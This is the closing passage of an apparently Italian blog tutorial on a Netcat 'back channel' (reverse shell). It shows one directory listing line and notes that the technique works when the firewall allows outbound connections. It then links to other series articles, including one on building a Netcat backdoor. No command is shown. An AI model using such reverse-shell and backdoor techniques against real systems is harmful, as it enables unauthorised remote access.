lrwxrwxrwx   1 root root    30 2008-08-24 17:52 vmlinuz -> boot/vmlinuz-2.6.24-19-generic

Naturalmente tutto questo funziona se il firewall permette connessioni in uscita (in genere lo permette).

Questo articolo fa parte della serie “Le 7 Vite di Netcat“. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:

• Leggere gli header HTTP e le pagine Web con Netcat

• Leggere la posta elettronica con Netcat

• Inviare email con Netcat

• Netcat come scanner

• Trasferire file con Netcat

• Creare una backdoor con Netcat

• Back Channel con Netcat

Segnala presso: